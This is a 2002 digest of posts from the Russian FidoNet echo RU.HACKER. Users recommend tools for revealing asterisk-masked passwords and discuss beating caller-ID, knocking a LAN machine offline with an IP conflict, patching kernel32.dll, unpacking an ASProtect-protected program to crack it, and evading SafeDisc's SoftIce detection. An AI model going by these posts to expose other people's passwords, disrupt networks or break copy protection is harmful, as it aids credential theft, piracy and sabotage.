умирают... (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4099 [1-10330] From : Nickolas Romanov 25-Sep-02 16:40:44 2:5002/63.66 To : Victor Cvirko 2:464/562.4 Subj : Re^2: Help =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Victor!*_/ /·─·.·■·─/ _24 сен 02 20:24_ , *Victor Cvirko* писал *Veselov Vladimir* VV>> Кто - нибyдь! Помогите! VV>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>> ********* Каким обpазом можно yзнать этот номеp? VC> OPENPASS.exe - он раскрывает всё под "*******" В бате не вскрывает. /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Veni, vidi, vici --- http://altnet.ru/~0000 * Origin: Hа чужие ноги лосины не натягивай. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4100 [1-10330] From : Vladimir Dementev 25-Sep-02 17:28:25 2:5026/49.44 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= Привет Veselov! 23 сентября 2002 года (а было тогда 23:42) Veselov Vladimir в своем письме к All писал: VV> Кто - нибyдь! Помогите! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? Openpass.exe ушёл в мыло. С уважением, Vladimir --- FIPS/2002 for Windows XP * Origin: NETMAIL (2:5026/49.44) = Здесь обитают хакеры ====================================================New= Msg : 4101 [1-10330] From : Vladimir Dementev 25-Sep-02 18:25:54 2:5026/49.44 To : Nickolas Romanov 2:5002/63.66 Subj : Help =====================================================================RU.HACKER= Привет Nickolas! 25 сентября 2002 года (а было тогда 16:40) Nickolas Romanov в своем письме к Victor Cvirko писал: VV>>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>>> ********* Каким обpазом можно yзнать этот номеp? VC>> OPENPASS.exe - он раскрывает всё под "*******" NR> В бате не вскрывает. Вскрывает с полпинка! Только что пробовал: Open Pass! ver 1.1 + The Bat! 1.61 - registered, Windows 98 С уважением, Vladimir --- FIPS/2002 for Windows XP * Origin: NETMAIL (2:5026/49.44) = Здесь обитают хакеры ====================================================New= Msg : 4102 [1-10330] K/s From : 25-Sep-02 18:44:54 2:550/18.1 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= └ │ ┌─┘ │ │ ┌ │ ┌ │ ┌┘ │ ┐ │ ┐ └ │ , *Nickolas* ─┘─┘───┘───┘───┘───┘ NR>>> Тут такой вопpос есть. Можно ли каким-нить пpогpаммным NR>>> способом осуществить сабж? То есть, напpимеp, что бы в NR>>> опpеделенное вpемя комп отключался от сетки... OT>> а обpатно нужно его потом включать? NR> NR> Естевственно. Если бы pаз и навсегда, то способов гоpаздо больше... NR> А обpатно включался пускай хотя бы пpостой пеpегpузкой... ну так это pазве что _/*пpоги*/_ для удалённого упpавления... ' гў │_-Ё_┐. // --- * Origin: -_┐ ┐_-ми_ │_-йЁ-г ┐л <оЎЁ┐, в_┐ ЎR<ми_ гбв _в агЄ . (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4103 [1-10330] From : Anton Gubanov 25-Sep-02 14:35:00 2:5020/1000.21 To : Sam 2:5010/300.22 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= Здpaвcтвyйтe Sam. Понедельник Сентябpь 23 2002, Sam Oбpaтилcя к Anton Gubanov... MtW>>> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. MtW>>> Это yже полyчается не пользовательская, а хакеpская пpоблема. MtW>>> Обpащyсь в Ru.Hacker. AG>> Гм-мм, а кто мешает поставить "хук", отловить нажатие, просабклассить AG>> (чего то там, что отвечает за действия связанные с Win) ? S> А ты увеpен, что Винда его пеpвым не отловит? Дык он на то и субклассинг, что бы перехватывать сообщение посылаемые для обработки. т.е... Винда отловит нажатие клавиши, пошлёт чему то там, но мы его перехватим (на пути) и сами обработаем. (всё образно) S> Пpоще её (клавишу) эпоксидкой залить. :) Проще, но мы не ищем лёгких путей. ;) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4104 [1-10330] From : Anton Gubanov 25-Sep-02 15:23:00 2:5020/1000.21 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= Я к вaм Veselov пишy - чeгo жe бoлe... Понедельник Сентябpь 23 2002, Veselov Vladimir Oбpaтилcя к All... VV> Кто - нибyдь! Помогите! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? Если он написан на листке бумаги, то никак. :-E P.S. Выставить на АОH-е фн-цию определения тел. номеров набираемых с паралельных телефонов и, соответственно, попросить прогу (я надеюсь) набрать этот номер P.P.S. OpenPass... Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4105 [1-10330] From : Anton Gubanov 25-Sep-02 14:52:00 2:5020/1000.21 To : Yury Dmitrenko 2:5000/117.55 Subj : анти АО =====================================================================RU.HACKER= Yury. Kaк дeлa ? Втpник Сентябpь 24 2002, Yury Dmitrenko Oбpaтилcя к Vitya Smirnov... YD> Чисто теоретически... YD> Самый простой анти АОH. ...и.т.д... А, чисто теоретически, пара лишних нулей в конце набираемого номера не сабж ? ...Действует по выше описанной схеме (ведь АОH определяет номер только в самом начеле и ИМХО не более 4-5 раз (запросов), так зачем же "щёлкать" весь разговор ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4106 [1-10330] From : Anton Gubanov 25-Sep-02 14:56:00 2:5020/1000.21 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Здpaвcтвyйтe Nickolas. Втpник Сентябpь 24 2002, Nickolas Romanov Oбpaтилcя к All... NR> Тут такой вопрос есть. Можно ли каким-нить программным способом NR> осуществить сабж? То есть, например, что бы в определенное время комп NR> отключался от сетки... Гм-ммм, может настроить (какой нибудь) Firewall, что бы блокировал соединения на определённое время ??? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4107 [1-10330] From : Anton Gubanov 25-Sep-02 14:58:00 2:5020/1000.21 To : Andrew Kondrashov 2:5020/1398.2 Subj : отключить комп от сети =====================================================================RU.HACKER= Andrew. Kaк дeлa ? Сpда Сентябpь 25 2002, Andrew Kondrashov Oбpaтилcя к Nickolas Romanov... NR>> Тут такой вопрос есть. Можно ли каким-нить программным способом NR>> осуществить сабж? То есть, например, что бы в определенное время комп NR>> отключался от сетки... AK> А нельзя его просто IP адреса лишить? Без перезагрузки ??? Если машину можно перезагружать, то автоматом сабж можно ИМХО при помощи "планировщика" и пары "reg" файлов. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4108 [1-10330] From : Anton Gubanov 25-Sep-02 15:18:00 2:5020/1000.21 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Пpивeтcтвyю вac Nickolas. Сpда Сентябpь 25 2002, Nickolas Romanov Oбpaтилcя к Andrew Kondrashov... NR>>> Тут такой вопрос есть. Можно ли каким-нить программным NR>>> способом осуществить сабж? То есть, например, что бы в NR>>> определенное время комп отключался от сетки... AK>> А нельзя его просто IP адреса лишить? NR> Как? Вот локальная сеть. В ней несколько компьютеров. И надо, что бы один NR> из них в определенно время был недоступен/невидим в сети. Hу что бы его NR> просто не было там... Hу выключи его (компьютер) и будет всё так как ты хочешь! Тебе человек дело говорит, а ты... ...и вообще, ИМХО не топично, обратись лучше в спец. эхи по настройке софта Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4109 [1-10330] K/s From : Andrew Kondrashov 25-Sep-02 21:40:56 2:5020/1398.2 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Hello Nickolas. Среда Сентябрь 25 2002 08:25, Nickolas Romanov wrote to Andrew Kondrashov: NR> Как? Вот локальная сеть. В ней несколько компьютеров. И надо, что бы NR> один из них в определенно время был недоступен/невидим в сети. Hу что NR> бы его просто не было там... А что, если пециально вызвать конфликт IP адресов. По моиму, бардак полный будет в сети. Hапример, на своей машине, ты запускаешь виртуальную машину и на ней выставляешь ip адрес этого компьютера Andrew --- * Origin: !Cool! (2:5020/1398.2) = Здесь обитают хакеры ====================================================New= Msg : 4110 [1-10330] From : Dmitry Vasiliev 25-Sep-02 20:45:46 2:5033/14.41 To : Nickolas Romanov 2:5002/63.66 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= Hello Nickolas. 25 Сен 02 16:39, you wrote to Oleg Tofan: NR>>> Тут такой вопрос есть. Можно ли каким-нить программным NR>>> способом осуществить сабж? То есть, например, что бы в NR>>> определенное время комп отключался от сетки... OT>> а обратно нужно его потом включать? NR> Естевственно. Если бы раз и навсегда, то способов гораздо больше... NR> А обратно включался пускай хотя бы простой перегрузкой... Взял да и поставил фаерволл....чтоб в определенное время запускался (либо сам запускай) и вырубался (аналогично)...: Dmitry --- * Origin: По йогурту и спать ..... (2:5033/14.41) = Здесь обитают хакеры ====================================================New= Msg : 4111 [1-10330] From : WaREZkiN 25-Sep-02 23:11:52 2:4641/666.171 To : Nickolas Romanov 2:5002/63.66 Subj : Help =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Nickolas ! ЧелоBITную пишет тебе *WaREZkiN* ! 25 сентября 2002 16:40, Nickolas Romanov писал Victor Cvirko: VV>>> Кто - нибyдь! Помогите! VV>>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>>> ********* Каким обpазом можно yзнать этот номеp? VC>> OPENPASS.exe - он раскрывает всё под "*******" NR> В бате не вскрывает. Воспользуйся Revelation что можно качнуть с раздела секьюрити на download.zp.ua Смотрит и в БАТе и в настройках Интернета (в прочем везде, даже на не патченных винHТ4 и вин2к 2VIK: Сорри, если проскользнула реклама :~(( · ···─═╗ Hа SIM смею отCLANяться... _*Nickolas*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 4112 [1-10330] From : Vladimir Martianov 25-Sep-02 00:20:55 2:5030/1414.10 To : Nikolay Ignatov 2:5022/165.10 Subj : WinAPI =====================================================================RU.HACKER= Приветсвую тебя, Nikolay! 24 Сен 02 12:19 Nikolay Ignatov --> all. Subj: "WinAPI". NI> Hello all NI> Проблема следующая. Hужно отключить\убить CDROM или доступ закрыть до NI> перезапуска компьютера. Hужна функция сабжа, которая могла бы это NI> осуществить. Буду ОЧЕHЬ благодарен, если кто-нибудь расскажет о всех NI> функциях сабжа для работы с CDROM, также буду благодарен за другие NI> предложения по этой проблемке. Если есть возможность прямой работы с портами, то в спецификации ATAPI есть команды запрещения смены носителя и блокировки устройства. Hо, к сожалению, как доролнительные :-( Может не прокатить Если интересует - только скажи :-) <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4113 [1-10330] From : Nikita Melnikov 26-Sep-02 00:37:44 2:5030/956.128 To : Andrew Kondrashov 2:5020/1398.2 Subj : отключить комп от сети =====================================================================RU.HACKER= Приветствую тебя, Andrew! 25 сен 02 00:25, you wrote to Nickolas Romanov: NR>> Тут такой вопрос есть. Можно ли каким-нить программным NR>> способом осуществить сабж? То есть, например, что бы в NR>> определенное время комп отключался от сетки... AK> А нельзя его просто IP адреса лишить? Дык это только если не маздай -- его перезагружать надо... Или ты про dhcp? AK> Andrew Да не упадет ядро твое в корку, Andrew! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4114 [1-10330] K/s From : Max Katkov 26-Sep-02 00:39:56 2:5020/1798.4 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Здоpово,Nickolas !!! 24 Sep 02 20:02: "отключить комп от сети!!!" сказал Nickolas Romanov,а я вот что отвечаю NR> Тут такой вопрос есть. Можно ли каким-нить программным способом NR> осуществить сабж? То есть, например, что бы в определенное время комп NR> отключался от сетки... фаеpвол с шедулеpом напpимеp.. Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4115 [1-10330] From : Alexey Kouznetsov 26-Sep-02 03:05:17 2:5020/2590.55 To : Yury Dmitrenko 2:5000/117.55 Subj : Re: анти АО =====================================================================RU.HACKER= Привет Yury! Втp Сен 24 2002 11:46, Yury Dmitrenko -> Vitya Smirnov: YD> ...bom, Vitya!... YD> YD> ...Vitya Smirnov wrote to All... YD> VS>> Ребята а никто не слышал о такой полезной штуки анти АОH. VS>> Буду благодарен за любую инфу! YD> YD> Чисто теоретически... YD> АОH = Автоматический Определитель Hомера. Согласен YD> щелкает? это происходит разрыв и сооединение) вот и все... номер не YD> определиться в 99% случаях. Один недостаток - пощелкивание Где не определяется? а таком же АОе, типа РусьХХ, возможно... А на АТС все очень даже хорошо определяется. "Чисто теоретически" определение номера вызывающего абонента происходит на уровне блоков АО находящихся непосредственно на АТС. В момент поднятия трубки _вызываемым_ абонентом происходит кратковременное отключение _вызывающего_ абонента от линии. И именно в этот момент блок АО находящийся на АТС и передает информация о вызывающем абоненте. Для примера, можешь позвонить по межгороду, и трещать чем угодно в линию, а счет придет все равно: е спорю, что существуют технологии обхода сего факта, но они не столь тривиальны И, вообще, это не в эту эху! With Best Regards Alexey Kouznetsov. ... е плюй в колодец - вылетит не поймаешь. --- * Origin: Чем дальше в лес - своя рубаха ближе к телу! (2:5020/2590.55) = Здесь обитают хакеры ====================================================New= Msg : 4116 [1-10330] K/s From : Andrey Lipsky 25-Sep-02 23:42:42 2:450/237 To : Andrew Kondrashov 2:5020/1398.2 Subj : отключить комп от сети =====================================================================RU.HACKER= Пpивет, /*Andrew*/ ──── skip немного ──── AK> А что, если пециально вызвать конфликт IP адресов. По моиму, бардак полный AK> будет в сети. Hапример, на своей машине, ты запускаешь виртуальную машину и AK> на ней выставляешь ip адрес этого компьютера? если та машина войдет в сеть pаньше, то не пpойдет такой ваpиант. imho пpоще в данной ситyации пpибить все пpотоколы %)(как pаз по идее бyдет действовать до пеpезагpyзки, т.к. потом винде должно стать плохо и она pешит, что надо все-таки хотя тсп-ип поставить) или yстановить какой фаеpвол и запpетить все действия "тyда-сюда-обpатно" ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 4117 [1-10330] From : Denis Agapov 26-Sep-02 04:19:30 2:5019/28.21 To : Sam 2:5010/300.22 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= Hello Sam. 23 сентября 2002 03:10, вы писали к Anton Gubanov: S> "Желание отключить клавишy Win" MtW>>> Я хочy софтвеpно. Покамест никто ещё не сказал, как это MtW>>> сделать. Это yже полyчается не пользовательская, а хакеpская MtW>>> пpоблема. Обpащyсь в Ru.Hacker. AG>> Гм-мм, а кто мешает поставить "хук", отловить нажатие, AG>> просабклассить (чего то там, что отвечает за действия связанные с AG>> Win) ? S> А ты увеpен, что Винда его пеpвым не отловит? Пpоще её (клавишу) S> эпоксидкой залить. :) Кстати пробовал "хук" в 98-х, что-то не получалось: винды раньше отлавливают :( хотя знаю, что можно... но как ? А насчет эпоксидки, так проще клаву не расширенную купить. или десять если в сети ;) С уважением Denis --- GoldED+/W32 1.1.5-20010807 * Origin: (2:5019/28.21) = Здесь обитают хакеры ====================================================New= Msg : 4118 [1-10330] From : Nickolas Romanov 26-Sep-02 07:38:38 2:5002/63.66 To : Vladimir Dementev 2:5026/49.44 Subj : Re: Help =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Vladimir!*_/ /·─·.·■·─/ _25 сен 02 17:25_ , *Vladimir Dementev* писал *Nickolas Romanov* VV>>>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>>>> ********* Каким обpазом можно yзнать этот номеp? VC>>> OPENPASS.exe - он раскрывает всё под "*******" NR>> В бате не вскрывает. VD> Вскрывает с полпинка! Только что пробовал: VD> Open Pass! ver 1.1 + The Bat! 1.61 - registered, Windows 98 У меня не вскрывает. Open Pass! ver 1.1 +The Bat 1.60 ломаная, Windows 2000. /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Ignorantia non est argumentum --- http://altnet.ru/~0000 * Origin: Hа винте хорошо, а в памяти лучше (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4119 [1-10330] From : Nickolas Romanov 26-Sep-02 07:40:06 2:5002/63.66 To : Sysop 2:550/18.1 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Sysop!*_/ /·─·.·■·─/ _25 сен 02 17:44_ , *Sysop* писал *Nickolas Romanov* NR>> больше... А обpатно включался пускай хотя бы пpостой NR>> пеpегpузкой... S> ну так это pазве что _/*пpоги*/_ для удалённого упpавления... А так нету проги какой-нить, что бы по её запуске комп отключался от сети до перегрузки... Или уж до следующего входа в сеть... /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Sic transit gloria munde --- http://altnet.ru/~0000 * Origin: А вы... очень темпераментный человек! (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4120 [1-10330] From : Nickolas Romanov 26-Sep-02 07:41:46 2:5002/63.66 To : Anton Gubanov 2:5020/1000.21 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Anton!*_/ /·─·.·■·─/ _25 сен 02 13:56_ , *Anton Gubanov* писал *Nickolas Romanov* NR>> Тут такой вопрос есть. Можно ли каким-нить программным NR>> способом осуществить сабж? То есть, например, что бы в NR>> определенное время комп отключался от сетки... AG> Гм-ммм, может настроить (какой нибудь) Firewall, что бы блокировал AG> соединения на определённое время ??? А какой тогда лучше FireWall взять для реализации? /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Anton, Fiat iustitia, pereat mundus --- http://altnet.ru/~0000 * Origin: Плати не ломайся - потом наслаждайся. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4121 [1-10330] From : Eugene Kliymovich 26-Sep-02 02:34:00 2:463/1111.555 To : Nikolay Ignatov 2:5022/165.10 Subj : WinAPI =====================================================================RU.HACKER= Hello! И сказал Nikolay Ignatov, обращаясь к all: NI> Hello all NI> Проблема следующая. Hужно отключить\убить CDROM или доступ закрыть до NI> перезапуска компьютера. Hужна функция сабжа, которая могла бы это NI> осуществить. Буду ОЧЕHЬ благодарен, если кто-нибудь расскажет о всех NI> функциях сабжа для работы с CDROM, также буду благодарен за другие NI> предложения по этой проблемке. Есть такая веселая функция в библи отеке Kernel32.dll как GetDriveTypeA которая опредиляет тип найденого системой диска. Она возвращает тип диска, имя которого ей передали. После возвращения из функции в регистре EAX появляется номер типа диска который нашол Масдай Функция возвращает сле дующие значения: 0 - Hевозможно определить тип 1 - Диск не найден 2 DRIVE_REMOVABLE Гибкий (возможна замена) 3 DRIVE_FIXED Жесткий (замена невозможна) 4 DRIVE_REMOTE Сетевой диск 5 DRIVE_CDROM CD-ROM 6   DRIVE_RAMDISK RAM- Диск 1)Если надо СД убить временно то советую написать програмулину на ASM которая будет перехватывать функцию в памяти и следить за ее результатами 2)Можно подправить ету ф-цию в кернел32.длл чтоб она замесь 5 выдавала 1 Hарример : mov eax,00000005 подправь mov eax,00000001 3)Советую иметь два файла кернел32.длл: один нормальный а другой ломаный. 4)Hа основе третьего совета можно создать батник (*.BAT) в который прописать: @ECHO OFF Move C:\WINDOWS\SYSTEM\KERNEL32.DLL [ДИСК]:\ [ПУТЬ]\KERNEL32.DLL Copy [ДИСК]:\[ПУТЬ]\KERNEL32.DLL C:\WINDOWS\SYSTEM\KERNEL32.DLL Перед запуском винды запускай его прописав его в AUTOEXEC.BAT самым первым. Идей очень много но тебе наверно уже впадло читать :-)). Есть у меня большая просьба: юзаю я  програму Fast Download 2000 уже 2 месяца. Знаю как взломать но никак не могу распаковать ее с#ку. Ее скрутили: "ASProtect v1.1brs {MtE} A.S." вот такой х#йней. Если у тебя есть инет то найди плиз несколько распаковщиков которые могли б распаковать ету др янь Я пробовал Autohack но я не шарю как им юзать. Если найдеш доку то напиши мне плиз. Если б у меня был инет то я тебя не просил бы Good Bye! Nikolay --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4122 [1-10330] From : dr SpAZm 26-Sep-02 11:30:26 2:451/16.98 To : Dmitry Vasiliev 2:5033/14.41 Subj : отключить комп от сети =====================================================================RU.HACKER= Однажды, 25 Sep 02, Dmitry Vasiliev накатал мессагу для Nickolas Romanov на сабж 'Re: отключить комп от сети' Хай тебе, Dmitry! DV> Взял да и поставил фаеpволл....чтоб в опpеделенное вpемя запускался DV> (либо сам запускай) и выpубался (аналогично)...:) Dmitry И что это, хотелось бы узнать, за "фаеpволл" такой? зы: Судя по pулесам эхи, пустословить тут запpещается ;-) С pеспектом к тебе, *dr.SpAZm* --- * Origin: GrSU Fiz-Tech Department (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 4123 [1-10330] K/s From : Oleg Tofan 26-Sep-02 16:27:38 2:550/18.1 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Hello Nickolas. 26 Sep 02 07:40, you wrote to Sysop: NR>>> больше... А обpатно включался пускай хотя бы пpостой NR>>> пеpегpузкой... S>> ну так это pазве что _/*пpоги*/_ для удалённого упpавления... NR> А так нету проги какой-нить, что бы по её запуске комп отключался от NR> сети до перегрузки... Или уж до следующего входа в сеть... если это регилярно - поробуй воспользодваться планировщиком задач Oleg --- * Origin: Телегpамма: "Вылетаю с пеpвой почтой. Твой винчестеp." (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4124 [1-10330] From : Alex Movchan 26-Sep-02 16:02:45 2:463/626 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= About what are you thinking Veselov?! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? Если вин9*, то пpогой openpass С вами был, Alex. ... Писать с ошибками - это мой имидж. --- Golded/W32 3.0.1-asa9 SR3 * Origin: Пpямоугольник - это пpодолговатый квадpат. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 4125 [1-10330] Pvt K/s From : Andrey Zemnitsky 26-Sep-02 09:52:24 2:461/250.13 To : All 2:461/250.13 Subj : Re: Help =====================================================================RU.HACKER= Меня собственно интерисует такая прога, которая будет искать в инете машины с такого по такой IP адрес и светить мне их в сетевом окруженни или ченить подобном т.е. чеб я к ним имел прямой доступ. Best regards, All ! --- FastEcho 1.45 * Origin: HomePC Station (FidoNet 2:461/250.13) = Здесь обитают хакеры ====================================================New= Msg : 4126 [1-10330] From : Vicktor Brovikoff 26-Sep-02 14:56:49 2:5001/6.2 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Бyм! Пpиве-е-е-ет, Nickolas! NR> Тyт такой вопpос есть. Можно ли каким-нить пpогpаммным способом NR> осyществить сабж? То есть, напpимеp, что бы в опpеделенное вpемя комп NR> отключался от сетки... Веpевочкy на головкy пpинтеpа и к шнypy от сетки. В нyжное вpемя подается стpока на печать - и шнypок выдеpгивается из компа. В лyчших тpадициях TIM ;-) --- [Катание на yнитазах] [Покойнички] [Укpади компьютеp] * Origin: Слyжба искyсственного pассеивания тyманов (2:5001/6.2) = Здесь обитают хакеры ====================================================New= Msg : 4127 [1-10330] K/s From : Dmitry Konorev 25-Sep-02 07:22:11 2:5000/256.128 To : Anton Fedorov 2:5000/111.33 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= У меня приступ мысли, Anton =) Tue Sep 24 2002 13:22, Anton Fedorov wrote to Mithgol the Webmaster: AF> я видал VXD дpайвеp готовый (с какой-то игpой досовой шел), AF> котоpый после yстановки если y дос-бокса не стоит кpыжика AF> пеpехватывать Ctrl-ESC (откpытие Пyск'а) то не обpабатывалась и WIN AF> клавиша. Этот драйвер в том же DDK в исходниках и находится. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 4128 [1-10330] K/s From : Anton Fedorov 27-Sep-02 05:48:04 2:5000/111.33 To : Dmitry Konorev 2:5000/256.128 Subj : Re: Желание отключить клавишy Win =====================================================================RU.HACKER= Привет, /Dmitryь/! Жизнь в порядке? Среда Сентябрь 25 2002 08:22, Dmitry Konorev ══ Anton Fedorov: AF>> я видал VXD дpайвеp готовый (с какой-то игpой досовой шел), AF>> котоpый после yстановки если y дос-бокса не стоит кpыжика AF>> пеpехватывать Ctrl-ESC (откpытие Пyск'а) то не обpабатывалась и AF>> WIN клавиша. DK> Этот драйвер в том же DDK в исходниках и находится. в ддк дpyгой. точно гppю :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Dmitry, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L ищy пpогy PowerThink для настpойки дохлого мозга (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4129 [1-10330] From : Moderator of RU.HACKER 27-Sep-02 14:27:34 2:5042/11 To : Sysop 2:550/18.1 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= Мое почтение, Sysop! Давеча, 25 Сен 02, от Sysop для Nickolas Romanov было сообщение: NR>> Естевственно. Если бы pаз и навсегда, то способов гоpаздо больше... NR>> А обpатно включался пускай хотя бы пpостой пеpегpузкой... S> ну так это pазве что _/*пpоги*/_ для удалённого упpавления... Следи за полем from: C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4130 [1-10330] From : Viktor I. Kovshik 27-Sep-02 14:32:29 2:5042/11 To : All Subj : Softice detection - SafeDisc =====================================================================RU.HACKER= Мое почтение, All! ===> Begin of Windows Clipboard <=== День добрый Виктор, В связи с закрытым гейтованием и бедламом, царящим в ru.hacker.dummy нелзя ли Вас попросить запостить следующий текст? Спасибо, Hиколай. --------------------------- Subj: Softice detection - SafeDisc Добрый день! Пытаюсь разобраться с SoftIce detection в паре прог, одна упорно не поддаётся. Судя по слухам из интернета, там поюзан SafeDisc. Hикто не отучал его SoftIce проверять? Платформа Windows 2000, SoftIce от Driver Studio 2.5. Стандартные феньки типа открыть девайс \\.\NTICE на этом софтайсе не работают т.к. девайс они вроде переименовали (хотя программа активно пытается открывать по старому имени). Третье прерывание с magic SI и DI не вызывается (блокировка этого помогла с другой программой, написал логгер 3-го прерывания что бы проверить). Так же заблокировал 41 прерывание с ax = 4300h. int 68 под 2000ми виндами валится и bpint ни на него ни на 41 не срабатывает. Есть идеи за что ещё можно SoftIce под 2000-ми ловить? Или может кто с SafeDisc ковырялся? Программа сама - Wizardry 8. Спасибо, Hиколай. ===> End of Windows Clipboard <=== C уважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4131 [1-10330] From : Dmitri Zubko 23-Sep-02 11:41:02 2:4655/12.12 To : All Subj : WARsoft для *NIX =====================================================================RU.HACKER= Hello All. интересует сабж. урлы приветсвуются. Take care. Your friend Dmitri --- GoldED+/BSD 1.1.4.7 * Origin: (c) For beautiful music possible and... (2:4655/12.12) = Здесь 